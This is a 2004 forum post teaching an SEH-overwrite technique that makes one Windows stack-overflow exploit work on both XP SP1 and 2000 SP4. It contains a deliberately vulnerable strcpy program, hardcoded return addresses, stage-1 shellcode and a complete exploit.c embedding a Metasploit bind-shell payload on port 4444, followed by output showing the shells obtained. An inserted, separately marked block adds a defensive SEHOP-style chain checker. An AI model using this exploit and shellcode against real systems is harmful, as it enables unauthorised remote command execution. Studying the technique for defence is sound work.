Title: Exploiting Default Exception Handler to Increase Exploit Sta
Author: 韩冰   Time: 2004-11-19 10:39

The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every Windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address; in this case we will continue overwriting the stack and overwrite the default exception handler as well.

[Buf] <- Shellcode
[Return Address] <- jmp register (for Windows XP sp1)
[Various Stack Data] <- Junk
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
[SE Handler] <- jmp register (for Win2k sp4)
[Stage1 Shellcode] <- stage1 shellcode for win2k

If the first return address (Windows XP SP1) is wrong, an exception will occur and the default exception handler will be called (Windows 2000 SP4). This allows us to create a stable exploit with two return addresses.
Necessary Tools:
- OllyDBG
- C/C++ Compiler
- nasm
- Sac
Vulnerable Code:

//lamebuf.c
#include<stdio.h>
#include<string.h>
#include<windows.h>
int main(int argc,char *argv[]){
    char buf[512];
    char buf1[1024]; // <- simulate a stack
    //DebugBreak();
    if (argc != 2){ return -1; }
    strcpy(buf,argv[1]); // unbounded copy: an argument longer than 512 bytes overruns buf
    return 0x0;
}
Getting Started:
Before writing the exploit, let's see what happens when we overflow this application with 1600 bytes. The application crashed with the following register state:

EAX 00000000
ECX 00321404
EDX 00414141
EBX 7FFDF000
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 41414141
ESI 77D4595F
EDI 77F59037 ntdll.77F59037
EIP 41414141

Let's take a look at the stack and see what happened to the default exception handler:

0x0012FFB0 41414141 Pointer to next SEH Record
0x0012FFB4 41414141 SE Handler

We successfully overwrote the return address and the default exception handler.
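As an added illustration (not part of the original post), here is how a chain-integrity check modelled loosely on Windows' later SEHOP mitigation catches exactly this overwrite: it walks the SEH registration list from its head and requires that it stay inside the stack and end, at the last record, in the known default handler. The stack image, offsets and handler addresses are constructed for the demo; only the two attacker values in build_forged come from the post.

```c
#include <stdint.h>
#include <string.h>
/* Constructed 32-bit stack image: "pointers" are byte offsets into this array.
 * All offsets and handler values here are made up for the demo (except the two
 * attacker values in build_forged, which are the ones shown in the post). */
#define STACK_BYTES   64u
#define END_OF_CHAIN  0xFFFFFFFFu   /* Next-pointer value that terminates the SEH chain */
#define FINAL_HANDLER 0x77F5A000u   /* stand-in for the process's default (last) handler */
static uint32_t rd32(const uint8_t *s, uint32_t off) {   /* little-endian load */
    return (uint32_t)s[off] | (uint32_t)s[off+1] << 8 | (uint32_t)s[off+2] << 16 | (uint32_t)s[off+3] << 24;
}
static void wr32(uint8_t *s, uint32_t off, uint32_t v) {   /* little-endian store */
    s[off] = (uint8_t)v; s[off+1] = (uint8_t)(v >> 8); s[off+2] = (uint8_t)(v >> 16); s[off+3] = (uint8_t)(v >> 24);
}
/* SEHOP-style check: walk the chain from head_off. Every record must lie inside the stack
 * image and be 4-byte aligned, the walk must reach END_OF_CHAIN within max_hops, and the
 * last record's handler must be the default handler. Returns 1 if intact, 0 if corrupted. */
int seh_chain_intact(const uint8_t *s, uint32_t size, uint32_t head_off, int max_hops) {
    uint32_t off = head_off;
    for (int hops = 0; hops < max_hops; hops++) {
        if (off > size - 8 || (off & 3))      /* record outside the stack or misaligned */
            return 0;
        uint32_t next = rd32(s, off), handler = rd32(s, off + 4);
        if (next == END_OF_CHAIN)
            return handler == FINAL_HANDLER;  /* chain must end at the default handler */
        off = next;
    }
    return 0;                                 /* cycle, or chain longer than allowed */
}
/* Healthy chain: one in-module handler record at 0x10 linking to the default record at 0x30. */
static void build_clean(uint8_t *s) {
    memset(s, 0x90, STACK_BYTES);
    wr32(s, 0x10, 0x30);         wr32(s, 0x14, 0x00401200u);
    wr32(s, 0x30, END_OF_CHAIN); wr32(s, 0x34, FINAL_HANDLER);
}
/* The post's crash: a strcpy of 'A's runs over the last record, so both fields read 41414141. */
static void build_overflowed(uint8_t *s) {
    build_clean(s);
    memset(s + 0x20, 'A', 0x18);
}
/* The post's payload shape: next pointer replaced by a short jump, handler by a jmp-ebx address. */
static void build_forged(uint8_t *s) {
    build_clean(s);
    wr32(s, 0x30, 0xcccc06EBu); wr32(s, 0x34, 0x77F92A9Bu);
}
int demo_clean(void)      { uint8_t s[STACK_BYTES]; build_clean(s);      return seh_chain_intact(s, STACK_BYTES, 0x10, 8); }
int demo_overflowed(void) { uint8_t s[STACK_BYTES]; build_overflowed(s); return seh_chain_intact(s, STACK_BYTES, 0x10, 8); }
int demo_forged(void)     { uint8_t s[STACK_BYTES]; build_forged(s);     return seh_chain_intact(s, STACK_BYTES, 0x10, 8); }
```

Both the 'A'-filled and the forged images fail the walk because the overwritten next pointer no longer lands inside the stack, which is the same signal SEHOP uses to refuse dispatch.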
Primary Return Address (Windows XP SP1 EN):
The first return address will be called as in a normal stack overflow. We can see that esp points to user input, so we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
Secondary Return Address (Windows 2000 SP4 EN):
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
Proof Of Concept:

// exploit.c
// Tal zeltzer - [Double Return]
//
#include<stdio.h>
#include<string.h>
#include<windows.h>
#include<process.h> // execve

#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx

// Stage1 For WinXP Sp1 English
// mov ecx,esp ; dec ch (x6, ecx -= 0x600) ; mov esp,ecx ; jmp esp
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";

// Stage1 For Win2k Sp4 English
// mov ecx,eax ; dec ch (x3, ecx -= 0x300) ; mov esp,ecx ; jmp ecx
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";

// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] http://metasploit.com
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc,char *argv[]){
    char *bufExe[3];
    char buf[2048];
    bufExe[0] = "lamebuf.exe";
    bufExe[2] = NULL;

    memset(buf,0x0,sizeof(buf));
    memset(buf,0x90,1652);                     // NOP sled filling the whole argument
    memcpy(&buf[24],shellcode,sizeof(shellcode)-1);

    memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
    memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage1 Shellcode
    *(unsigned long *)&buf[1540] = RET_XP;     // First RET (jmp esp) winXP sp1 en
    *(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
    *(unsigned long *)&buf[1588] = RET_WIN2K;  // Second RET (jmp ebx) win2k sp4 en

    bufExe[1] = buf;
    //Execute the vulnerable application
    execve(bufExe[0],bufExe,NULL);

    return 0x0;
}

Exploit under Windows XP SP1:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

Exploit under Windows 2000 SP4:
C:\>exploit
C:\>
C:\>telnet 127.0.0.1 4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.